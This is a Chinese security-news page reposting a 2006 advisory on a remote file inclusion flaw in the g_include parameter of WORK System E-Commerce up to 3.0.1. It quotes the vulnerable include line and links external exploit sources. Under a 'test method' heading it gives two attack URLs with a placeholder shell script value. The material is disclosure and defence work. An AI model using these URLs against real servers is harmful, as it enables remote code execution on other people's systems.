WORK System E-Commerce g_include参数远程文件包含漏洞

首页	安全动态	IT新闻	安全人物	本站动态	漏洞公告	病毒警报	木马预警
流氓软件	漏洞分析	入侵检测	升级补丁	安全配置	信道安全	设备安全	协议安全
WEB安全	病毒分析	木马研究	脚本注入	后门探讨	技术应用	数据安全	企业专区

收藏本站

设为首页

WORK System E-Commerce g_include参数远程文件包含漏洞

作者：佚名文章来源：不详点击数：更新时间：2007-1-26 15:14:24

2006-11-20 23:58:37

发布日期：2006-11-16
更新日期：2006-11-20

受影响系统：

Laurent Van den Reysen WORK system e-commerce <= 3.0.1

描述：

WORK System E-Commerce是一款动态内容和站点管理系统。

WORK System E-Commerce在处理用户请求时存在输入验证漏洞，远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意指令。

WORK System E-Commerce的index.php和module/forum/forum.php脚本没有正确验证g_include参数的输入，允许攻击者通过包含本地或外部资源文件执行任意PHP代码。漏洞相关的代码如下：

include ($g_include."<file>.inc");

<*来源：SlimTim10 （slimtim10@gmail.com）

  链接：http://secunia.com/advisories/22963/
        http://www.milw0rm.com/exploits/2752
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://[host]/work/index.php?g_include=[shell_script]
http://[host]/work/module/forum/forum.php?g_include=[shell_script]

建议：

厂商补丁：

Laurent Van den Reysen
----------------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://prdownloads.sourceforge.net/worksystem/worksystem_3_0_1.zip?download

新闻录入：admin 责任编辑：admin

上一篇新闻： Ultraseek信息泄露及请求代理漏洞

下一篇新闻： Alt-N MDaemon本地不安全默认目录权限漏洞

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】

　网友评论：（只显示最新10条。评论内容只代表网友观点，与本站立场无关！）

Crystal Reports .RPT文
Borland IDSQL32.DLL库远
IBM Tivoli Storage Man
Yukihiro Matsumoto Rub
CA BrightStor ARCserve
Microsoft Windows Medi
Microsoft Windows Work
CA BrightStor ARCserve
Apple Airport驱动远程代
Microsoft Windows Work

\| 设为首页 \| 加入收藏 \| 联系站长 \| 友情链接 \| 版权申明 \|
Copyright © 2006-2008　www.anquan365.com　安全365 建议使用1024*768分辨率及第三方浏览器对本站进行浏览